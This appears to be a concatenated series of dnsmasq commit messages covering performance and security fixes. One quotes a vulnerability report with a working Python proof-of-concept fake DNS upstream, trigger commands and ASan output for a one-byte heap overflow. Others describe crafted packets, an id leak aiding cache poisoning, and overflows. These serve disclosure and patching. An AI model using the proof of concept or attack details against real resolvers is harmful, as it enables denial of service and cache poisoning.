If a TCP listening socket is externally destroyed (e.g., via ss -K,
or a process using NETLINK_SOCK_DIAG/SOCK_DESTROY), accept()
permanently returns -1 with errno == EINVAL because the socket is
no longer in TCP_LISTEN state. Since poll() keeps reporting the
stale fd as readable, the main loop spins calling
do_tcp_connection() -> accept() indefinitely, consuming 100% CPU.
Distinguish transient errors (EAGAIN, ECONNABORTED, EMFILE, ENFILE,
ENOMEM, ENOBUFS) from fatal ones. On transient errors just return
and retry on the next poll cycle. On fatal errors close the tcpfd
and mark it -1 so poll() no longer selects it.
In --bind-dynamic mode the listener will be automatically rebuilt
on the next address change event via newaddress().
Signed-off-by: Yuefu Zhou <yuefu16.zhou@gmail.com>
--no-dhcpv4-interface=IFACE is documented to disable only DHCPv4 on an interface,
leaving DHCPv6/RA untouched. That's exactly how it's implemented in the option parser
(option.c, LOPT_NO_DHCP4 case): the exclusion entry is tagged INAME_4 only, with INAME_6
explicitly cleared. The two general-purpose exclusion checks that consult this list also
respect the split correctly:
- dhcp6.c:184-186 (regular DHCPv6 request handling)
- radv.c:187-189 and radv.c:836-839 (RA sending)
All three do:
if (tmp->name && (tmp->flags & INAME_6) && wildcard_match(tmp->name, iface))
But construct_worker() in dhcp6.c — the callback used to build a context from a
"constructor:IFACE" template range (dhcp-range=::,constructor:IFACE,ra-only,64,...) —
checks the same list without the flag test:
src/dhcp6.c, lines 700-702 (2.93; same in 2.90):
for (tmp = daemon->dhcp_except; tmp; tmp = tmp->next)
if (tmp->name && wildcard_match(tmp->name, ifrn_name))
return 1;
Because this only tests tmp->name and ignores tmp->flags, an interface added to
dhcp_except via --no-dhcpv4-interface (INAME_4 only, INAME_6 cleared) is excluded here
regardless — silently killing RA/DHCPv6 on that interface too, contradicting both the
documentation and the behaviour of every other exclusion check in the codebase.
By only checking the last-allocated block for space, the amount
off unused memory on the system is increased. This patch alters
things so that the 10 last-allocated blocks are checked. This
stil avoids the O(n^2) explosion but should improve memory efficiency.
When reloading large hosts files (e.g. 1.7M addn-hosts entries) on SIGHUP,
free_names() previously only reset block->last = 0 without unlinking or
moving blocks to a spare pool. As a result, all existing blocks remained
in hostblocks. When reloading, the head block was filled first and stayed
at the head while full, forcing store_name() to linearly traverse all
previously filled blocks for every subsequent name insertion. This resulted
in O(N^2) complexity, taking ~10 minutes for 1.7M records.
Fix this by introducing nameblock_spare (matching config_spare / big_free
spare pool semantics), moving freed blocks to the spare pool in free_names(),
and restricting store_name() to only check the active head block before
popping from nameblock_spare (or mallocing). This restores O(1) per-entry
insertion and reduces reload time from 10 minutes to ~3 seconds.
A DS query answered with an unsigned NXDOMAIN which contains neither NSEC
nor NSEC3 records leaves `dnssec_validate_reply()` without a proof of
non-existence, so it falls back to `zone_status()` to find out whether the
zone is unsigned. For a DS query, that returns `STAT_NEED_DS` for the very
name whose DS we are resolving. The frec dependency graph then contains a
cycle, the loop detection in `dnssec_validate()` catches it, and the query
ends up `ABANDONED` without any log message explaining why.
Treat this self-referential answer as insecure instead. It carries no
information either way, and the existing handling of insecure DS replies
already makes the right decision about it: unsigned is assumed for RFC-1918
reverse names when `--bogus-priv` is set, and for domains served by a
`--server=/domain/...` directive, everything else stays BOGUS.
This is what breaks reverse lookups when a private range is delegated with
`--rev-server` and DNSSEC is enabled. Validating the answer walks the chain
of trust down to `10.in-addr.arpa`, which is above the delegated zone and
therefore goes to the public upstream, and the public resolvers serve the
RFC 6303 empty reverse zones locally, without any DNSSEC records to prove
that they are unsigned. The existing `--bogus-priv` workaround for exactly
this behavior was never reached because validation was abandoned first.
Signed-off-by: DL6ER <dl6er@dl6er.de>
1861a881eb made the declaration of "a"
conditional on HAVE_LINUX_NETWORK, which was right as long as the
read_write() calls sat inside the same #ifdef.
Since 1da5cc2951 the parent blocks on
the pipe and the child writes the byte on every platform, so a build
without HAVE_LINUX_NETWORK now fails with "a undeclared" in both
do_tcp_connection() and swap_to_tcp(). This is easy to hit after
7ebe7ebb93, which gives *BSD a reason
to take that path.
Signed-off-by: DL6ER <dl6er@dl6er.de>
lookup_dhcp_len() returns the flag word from the option table, so
since 1af6ee6468 an option carrying
OT_DHCP6_VENDOR yields an opt_len of 0x0100.
--dhcp-option=option6:vendor-class,343 has a purely decimal argument
list and therefore takes the is_dec branch, which comes long before
the new OT_DHCP6_VENDOR branch, and
if (opt_len != 0)
new->len = opt_len;
sets new->len to 256. The value is then written by shifting an int by
up to 2040 bits, which is undefined behavior, and a 256-byte
vendor-class option ends up on the wire:
$ dnsmasq --test --dhcp-option=option6:vendor-class,343
option.c:1715:23: runtime error: shift exponent 2040 is too large
for 32-bit type 'int'
dnsmasq: syntax check OK.
The numeric spelling option6:16,343 takes the same path. Before
1af6ee6 both were rejected, as vendor-class was OT_INTERNAL back then.
Keep the is_dec branch away from OT_DHCP6_VENDOR, so the dedicated
parser runs and reports the missing vendor class instead.
Signed-off-by: DL6ER <dl6er@dl6er.de>
If upstream gives short lifetimes, local clients using RA for address
leasing can lose address access. This gives the ability to stretch
RAs to reasonable lifetimes.
Specifying --group without a value inhibits any change of gid. This
feature has existed since dnsmasq-2.43, released in 2008, but without
documentation, it has been lost to time, even though it's useful
in certain circumstances, mainly to do with containers.
Thanks to Leon Busch-George for his efforts to fix this.
An ancient miss-reading of "man setenv" lead to code which strips
'=' characters from the contents of enviroment variables set
in the dhcp-script. Equals characters are, of course banned in the
_name_ of environment variables, not the _value_.
If the hostname supplied by a DHCPv4 client doesn't pass the
test if being an allowed hostname (ie without metacharacters) it
is ignored, but still passed to the environment variable
DNSMASQ_SUPPLIED_HOSTNAME in the dhcp-script.
Change this so that only valid hostnames appear in thos variable,
to avoid security problems with scripts that son't sanitise.
This brings DHCPv4 behaviour in line with DHCPv6.
Thanks to Daniel Birtwhistle for spotting the problem.
Historically, DHCPv4 client options are configured as
dhcp-option=option:ntp-server,....
dhcp-option=42,....
DHCPv6 long ago added
dhcp-option=option6:sntp-server,....
dhcp-option=option6:31,....
This patch adds equivalents of this for DHCPv4
dhcp-option=option4:ntp-server,....
dhcp-option=option4:42,.....
and for good measure
dhcp-option=option:42,.....
and clarifies the man page.
Thanks to Martin-Éric Racine for pointing this out.
When dnsmasq forks a child to handle a TCP connection, the child
inherits copies of all listening sockets. These are never used but
keep the underlying sockets alive in the kernel. If a network
interface is removed and re-added while a child is running, the
parent's attempt to re-bind fails with EADDRINUSE because the child
still holds a reference.
Close all listener fds (UDP and TCP) in the child immediately after
fork in both do_tcp_connection() and swap_to_tcp().
[Original patch extended by Simon Kelley to include the TFTP listening
socket, and to extend the existing race-protection scheme for the
netlink socket to the listening sockets. Any bugs are my responsibility.]
The immediate motivation for this is to fix a potential
one byte buffer overflow. The rewrite to fix that resulted in
better code, but no other behavioural changes.
Thanks to Omkhar Arasaratnam for finding the overflow. His
report is below.
------------------------------------------------------------
Summary
-------
When packet dumping is enabled (--dumpfile / --dumpmask), dnsmasq writes one
byte past the end of the upstream-reply receive buffer whenever the reply it is
dumping has an odd byte length. do_dump_packet() pads the buffer for its
checksum computation with:
if (len & 1)
((unsigned char *)packet)[len] = 0; /* for checksum, in case length is odd. */
packet here is the exact-sized receive buffer for the upstream reply, so index
[len] is one byte out of bounds. A malicious or compromised upstream nameserver
(or an on-path attacker able to spoof a UDP reply) that returns an odd-length
answer triggers the overflow on every dumped packet.
Affected code (built HEAD cf08eeee12)
-------------------------------------------------------------------
- Sink: src/dump.c:243 — ((unsigned char *)packet)[len] = 0; in do_dump_packet()
- Reached via: dump_packet_udp() (src/dump.c:120) <- reply_query()
(src/forward.c:1224) <- check_dns_listeners() <- main().
Class: CWE-787 out-of-bounds write (1 byte). Impact: ASan/hardened-alloc abort
(remote DoS of the resolver) and latent 1-byte heap corruption in release builds.
Precondition: dumpfile/dumpmask enabled.
Reproduction
------------
PoC: poc.py (minimal fake upstream that returns an odd-length, DNS-shaped reply).
# Build at HEAD with dumpfile support + ASan
make -j4 CFLAGS="-DHAVE_DUMPFILE -fsanitize=address -g -O1"
export ASAN_OPTIONS=halt_on_error=1:abort_on_error=0:exitcode=99:detect_leaks=0
python3 poc.py 2267 & # odd length; 1497 also fires
dnsmasq --no-daemon --port=5353 --listen-address=127.0.0.1 --bind-interfaces \
--no-resolv --no-hosts --server=127.0.0.1#5354 \
--dumpfile=/tmp/dump.pcap --dumpmask=0xffff
# forward a query so the odd-length reply is dumped
dig @127.0.0.1 -p 5353 victim.test +tries=1 +time=3
Evidence
--------
stdout.txt — verbatim ASan report captured 2026-07-02 at built HEAD cf08eeee:
WRITE of size 1 ... 0 bytes to the right of 2267-byte region ... in do_dump_packet
src/dump.c:243:36, ==ABORTING.
Suggested fix
-------------
Do not write into packet[len]; compute the odd-byte checksum contribution from a
local copy of the final byte, or allocate the receive buffer one byte larger for
the dump path. Alternatively pad into a scratch buffer rather than mutating the
received packet in place.
---- PROOF-OF-CONCEPT: poc.py ----
import socket, struct, sys
PORT = 5354
TARGET_LEN = int(sys.argv[1]) if len(sys.argv) > 1 else 2267 # odd
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(('127.0.0.1', PORT))
s.settimeout(8.0)
print(f"[upstream] listening UDP/{PORT}", flush=True)
while True:
try:
data, addr = s.recvfrom(8192)
except socket.timeout:
print("[upstream] timeout, exiting", flush=True)
break
if len(data) < 12:
continue
qid = data[:2]
header = qid + struct.pack('!H', 0x8180) + struct.pack('!H', 1) + struct.pack('!H', 0) * 3
# echo the question section
i = 12
while i < len(data) and data[i] != 0:
i += 1 + data[i]
end_q = i + 1 + 4 if i < len(data) else len(data)
qsec = data[12:end_q]
body = header + qsec
pad = TARGET_LEN - len(body)
body = body + b'\x00' * pad if pad >= 0 else body[:TARGET_LEN]
s.sendto(body[:TARGET_LEN], addr)
print(f"[upstream] sent {len(body[:TARGET_LEN])} bytes to {addr}", flush=True)
break # one-shot
---- CAPTURED OUTPUT (verbatim from the run) ----
Fresh verbatim capture 2026-07-02. Built HEAD cf08eeee12.
ASAN_OPTIONS=halt_on_error=1:abort_on_error=0:exitcode=99:detect_leaks=0
Only the build-tree prefix has been neutralized to <ROOT>; PIDs, addresses,
offsets, frame symbols, line numbers and shadow bytes are otherwise verbatim.
dnsmasq: started, version UNKNOWN cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-UBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset no-nftset auth no-DNSSEC loop-detect inotify dumpfile
dnsmasq: using nameserver 127.0.0.1#5354
dnsmasq: cleared cache
dnsmasq: dumping packet 1 mask 0x0001
dnsmasq: dumping packet 2 mask 0x0004
=================================================================
==4200==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d000001d5b at pc 0x55d1d877eb3e bp 0x7fff30d2ad90 sp 0x7fff30d2ad88
WRITE of size 1 at 0x61d000001d5b thread T0
#0 0x55d1d877eb3d in do_dump_packet <ROOT>/src/dump.c:243:36
#1 0x55d1d877dc2d in dump_packet_udp <ROOT>/src/dump.c:120:8
#2 0x55d1d86f0533 in reply_query <ROOT>/src/forward.c:1224:3
#3 0x55d1d870d513 in check_dns_listeners <ROOT>/src/dnsmasq.c
#4 0x55d1d8709945 in main <ROOT>/src/dnsmasq.c:1318:2
#5 0x7fe839e29d8f (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 095c7ba148aeca81668091f718047078d57efddb)
#6 0x7fe839e29e3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: 095c7ba148aeca81668091f718047078d57efddb)
#7 0x55d1d85ee6d4 in _start (<ROOT>/src/dnsmasq+0x586d4) (BuildId: 1a53a57dfe7ae24e2759b8529f3347380facb52b)
0x61d000001d5b is located 0 bytes to the right of 2267-byte region [0x61d000001480,0x61d000001d5b)
allocated by thread T0 here:
#0 0x55d1d8671708 in __interceptor_calloc (<ROOT>/src/dnsmasq+0xdb708) (BuildId: 1a53a57dfe7ae24e2759b8529f3347380facb52b)
#1 0x55d1d86c95ad in safe_malloc <ROOT>/src/util.c:321:15
#2 0x7fe839e29d8f (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 095c7ba148aeca81668091f718047078d57efddb)
SUMMARY: AddressSanitizer: heap-buffer-overflow <ROOT>/src/dump.c:243:36 in do_dump_packet
Shadow bytes around the buggy address:
0x0c3a7fff8350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7fff8360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7fff8370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7fff8380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7fff8390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c3a7fff83a0: 00 00 00 00 00 00 00 00 00 00 00[03]fa fa fa fa
0x0c3a7fff83b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3a7fff83c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3a7fff83d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7fff83e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7fff83f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==4200==ABORTING
EXIT: ASan ==4200==ABORTING. heap-buffer-overflow WRITE of size 1, 0 bytes to the
right of the 2267-byte upstream-reply receive buffer. The odd-length (2267) reply
from the fake upstream drives do_dump_packet's odd-length checksum pad write at
src/dump.c:243 (`((unsigned char *)packet)[len] = 0;`) one byte past the buffer.
On further analysis, the problem is deeper: Other
error paths (which are not accessible to an attack) can also
return an incorrect header->id value, and most error paths
return incorrect query case if --do-0x20-encode is in use.
An oversight in commit f9f8d19bf5
leaves a code path where a repeat of a query gets an error reply
which discloses the id field used in interactions with upstream
servers ro get an answer to the query. By triggering this
code path, an attacker can determine the id, which makes Kaminsky
cache poisoning attacks much less expensive and much more certain.
This bug exists in stable releases 2.91, 2.92 2.92rel2 and 2.93
Thanks to Ronen Shustin from Project Atlas, Wiz for finding
this problem.
Implement the OT_DHCP6_VENDOR option type to properly handle the
DHCPv6 Vendor Class option (code 16) according to RFC 3315.
Previously, this option was marked as OT_INTERNAL, causing dnsmasq
to fail immediately if configured by name. Bypassing this block by
using the numerical option format (option6:16) caused the payload
to be formatted with an unintended string-length prefix. This broke
compliance because the RFC requires a fixed 4-byte Enterprise ID
at the beginning of the option, followed by data blocks.
This byte misalignment broke features like UEFI HTTP IPv6 Boot
This patch removes the OT_INTERNAL restriction and moves the formatting
logic to the parser phase, correctly assembling the wire-format layout
(4-byte ID + 2-byte chunk length + string) so it can be injected
directly into the network buffer.
Signed-off-by: Luiz Angelo Daros de Luca <luizluca@gmail.com>
If blockdata_expand() fails, it frees the existing block chain
and returns zero. Each call to blockdata_expand() checks for the zero return,
and calls blockdata_free() as part of its clean-up, resulting in
a double-free and crash.
Thanks to fallrig for finding this.
get_rdata() contains another instance of a crash caused by
a false value of RDLEN in a resource-record.
An RR containing name which is longer than the rdlen of the RR can
get get_rdata into a state where it calculates the length of the data
following the name as a negative number which is then promoted
to a very large positive number, and causing SIGSEGV.
This can be triggered by crafted packets from malicous DNS servers,
but only when DNSSEC validation is enabled. The attack packets do not
have to be correctly DNSSEC signed.
Thanks to Tristan G. for spotting this problem.
Also fix error handling for RRs with a fixed size fields in the specification
where the rrsize indicates that there are zero bytes in that position.
It turns out that subtracting NULL from a pointer to turn it into
an integer is not a good idea, because subtracting a NULL pointer
is undefined behaviour in C.
The correct way to do this is simply to cast the pointer to
uintptr_t. The only fly in this ointment is that the C standard
does not mandate support for uintptr_t. In practice, I doubt
anyone is running dnsmasq on the long-dead architectures where
this might be a problem.
Thanks to Matthias Andree for the heads-up.
If we stop reading a file before getting to the end, get_line_alloc()
will not clean up the memory it allocated. Give get_line_alloc()
the ability to do a forced cleanup by calling it with a NULL file,
and use that ability where we stop reading a file early.
Also clear the state variables when we free the memory, to
pre-empt use-after-free.
Assigning the result of getc() to a char makes comparing it to EOF
unreliable, at the very least. You're never too old to make newbie
mistakes.
Thanks to Sebastian Gottschall for spotting this.
print_mac() used to output into caller-supplied buffer with no
length checking. The various callers supplied different
length buffers and did their own, ad-hoc, length checking before
calling print_mac(). This was an accident waiting to happen and
it had actually happened in couple of places, with buffer
overflows possible.
print_mac() now returns the address of its own buffer, which
is grown as required.
Thanks to Nicholas Carlini <npc@anthropic.com> for spotting this problem.
Thanks to Michalis Vasileiadis for spotting this.
print_mac() writes each MAC byte to its output buffer with unbounded
sprintf and is called from main() with pkt.header.hlen straight out
of a BOOTREPLY. hlen is an attacker-controlled uint8_t (up to 255),
each byte expands to up to 3 chars, and the destination is a 500-byte
stack buffer. A malicious leasequery server that echoes the client's
transaction ID and replies with DHCPLEASEACTIVE and an oversized
hlen overflows that stack buffer.
The patch caps len inside print_mac at DHCP_CHADDR_MAX (16), which is
the actual size of chaddr in the BOOTP header and an upper bound on
any legitimate hardware-address length. The other in-file caller of
print_mac already clamps its length argument to 14 before the call,
so this change is local to the vulnerable path.
The current local address range is fd00::/8, but RFC 4193
para 3.1/3.2 reserves fc00::/8 for future use as local addresses,
so add that to the list.
Thanks to Michalis Vasileiadis for spotting this omission.
Full credit to Jerry Tom <goonsomeway@gmail.com> for finding this.
When DNSSEC validation falls back to TCP (via a forked child process),
the parent uses a uid-based check to detect whether a frec has been
freed and reused before the child returns. It doesn't, however check for
the more likely scenario which is that the frec has simply been
freed via the timeout path in get_new_frec(). This leads to a
use-after-free on an already freed frec.
Also ripple effects for most of its callers.
This fixes an OOB write caused by bad pointer arithmetic
calculating the pointer-to-end-of-packet used before.
Thanks to Donghyeon Jeong for spotting the bug.
This fixes an OOB write caused by bad pointer arithmetic
calculating the pointer-to-end-of-packet used before.
Thanks to Donghyeon Jeong for spotting the bug.
Before this fix, the code could read a couple of bytes beyond
valid data when an invalid too-short packet was recieved.
Thanks to Sokhna Walo DIAKHATE <sokhnawalodiakhate@esp.sn>
for the bug report.
commit 1269f074f8 broke
hostname_issubdomain() and then accidentally fixed
some of the problems by inverting the argument order
in the new uses of the function it introduced.
All the pre-existing calls to hostname_issubdomain()
were left in a non-working state.
This fixes hostname_issubdomain() back to the state
before 1269f074f8, adds
some logic to give correct answers when comparing
to the root domain, and gets right the new calls to
hostname_issubdomain() added in
1269f074f8
Thanks to Jean Thomas for spotting this problem.
Stop using the namebuff buffer to read config file
lines. This reduced in size in
014e909f78 and caused
regressions. We now resize the buffer as needed,
so there is no practical limit.
Use the same code to remove the same limit when reading
/etc/ethers and /etc/resolv.conf. Also when copying output
from the lease-change script into the log.
Thanks to Kevin Darbyshire-Bryant for finding the regresssion.
In find_soa() extract_name() is called with extrabytes=0 when parsing NS
record names, which means it only validates that the DNS name fits
within the packet but does not check that 10 additional bytes exist for
the type/class/TTL/rdlen fixed fields. Lines 546-549 then
unconditionally read these 10 bytes via GETSHORT/GETLONG macros. An
attacker controlling a DNS zone can craft a NXDOMAIN response where the
NS record name extends to the packet boundary, causing a 10-byte
out-of-bounds read past the valid packet data (CWE-125, CVSS 5.3
Medium). The read stays within the over-allocated packet buffer in
default configurations, limiting crash risk, but accesses data outside
the logical packet boundary. Under certain conditions, the overread may
access stale heap data from prior transactions.
The fix is straightforward: change the extrabytes
argument from 0 to 10, consistent with other call sites in
the same file.
Credit is due to do litli for finding this problem.